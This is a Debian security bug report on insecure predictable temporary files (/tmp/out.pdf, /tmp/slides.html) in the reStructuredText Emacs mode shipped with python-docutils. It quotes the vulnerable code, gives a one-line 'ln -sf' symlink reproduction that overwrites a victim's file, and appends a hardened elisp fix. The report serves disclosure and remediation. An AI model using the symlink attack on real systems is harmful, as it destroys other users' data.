Jakub Wilk
2009-Dec-11 22:43 UTC
[Secure-testing-team] Bug#560755: python-docutils: insecure use of temporary files
Package: python-docutils
Version: 0.5-2
Severity: grave
Tags: security help
Justification: user security hole

Emacs major mode for reStructuredText (rst.el) uses temporary files with
predictable names in an insecure fashion:

| (defun rst-compile-pdf-preview ()
|   "Convert the document to a PDF file and launch a preview program."
|   (interactive)
|   (let* ((tmp-filename "/tmp/out.pdf")
|          (command (format "%s %s %s && %s %s"
|                           (cadr (assq 'pdf rst-compile-toolsets))
|                           buffer-file-name tmp-filename
|                           rst-pdf-program tmp-filename)))
|     (start-process-shell-command "rst-pdf-preview" nil command)
|     ;; Note: you could also use (compile command) to view the compilation
|     ;; output.
|     ))
[...]
| (defun rst-compile-slides-preview ()
|   "Convert the document to an S5 slide presentation and launch a preview program."
|   (interactive)
|   (let* ((tmp-filename "/tmp/slides.html")
|          (command (format "%s %s %s && %s %s"
|                           (cadr (assq 's5 rst-compile-toolsets))
|                           buffer-file-name tmp-filename
|                           rst-slides-program tmp-filename)))
|     (start-process-shell-command "rst-slides-preview" nil command)
|     ;; Note: you could also use (compile command) to view the compilation
|     ;; output.
|     ))

How to reproduce/exploit this bug
---------------------------------

Attacker:
$ ln -sf /path/to/file/the/attacker/want/to/overwrite /tmp/slides.html

Victim:
$ emacs foo.rst
M-x rst-mode
C-c 5

-- 
Jakub Wilk
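
Added example, not part of the original report and not rst.el's own code: one way to avoid the fixed /tmp names is to have Emacs create the output file with make-temp-file, which picks an unpredictable name and creates the file for the current user only, so a symlink planted in advance is never followed. The my-rst-* names are hypothetical; rst-compile-toolsets, rst-pdf-program and rst-slides-program are the variables used in the quoted code.

```elisp
;; Hardened sketch of the two preview commands quoted in the report.
;; Assumption: rst.el is available and defines the variables used below.
(require 'rst)

(defun my-rst--preview (toolset viewer suffix)
  "Compile the visited file with TOOLSET into a private temp file, then run VIEWER.
TOOLSET is a key of `rst-compile-toolsets'; SUFFIX is the output extension."
  (let* (;; make-temp-file creates the file exclusively, readable and
         ;; writable by the current user only, under a random name in
         ;; `temporary-file-directory'.
         (out (make-temp-file "rst-preview-" nil suffix))
         (command (format "%s %s %s && %s %s"
                          (cadr (assq toolset rst-compile-toolsets))
                          ;; Quote both paths so spaces or shell
                          ;; metacharacters are not interpreted.
                          (shell-quote-argument buffer-file-name)
                          (shell-quote-argument out)
                          viewer
                          (shell-quote-argument out))))
    (start-process-shell-command "rst-preview" nil command)))

(defun my-rst-compile-pdf-preview ()
  "Convert the document to a PDF file and launch a preview program."
  (interactive)
  (my-rst--preview 'pdf rst-pdf-program ".pdf"))

(defun my-rst-compile-slides-preview ()
  "Convert the document to an S5 slide presentation and launch a preview program."
  (interactive)
  (my-rst--preview 's5 rst-slides-program ".html"))
```

The temporary file is left in place for the viewer; a caller that wants cleanup can delete it from a process sentinel once the viewer exits.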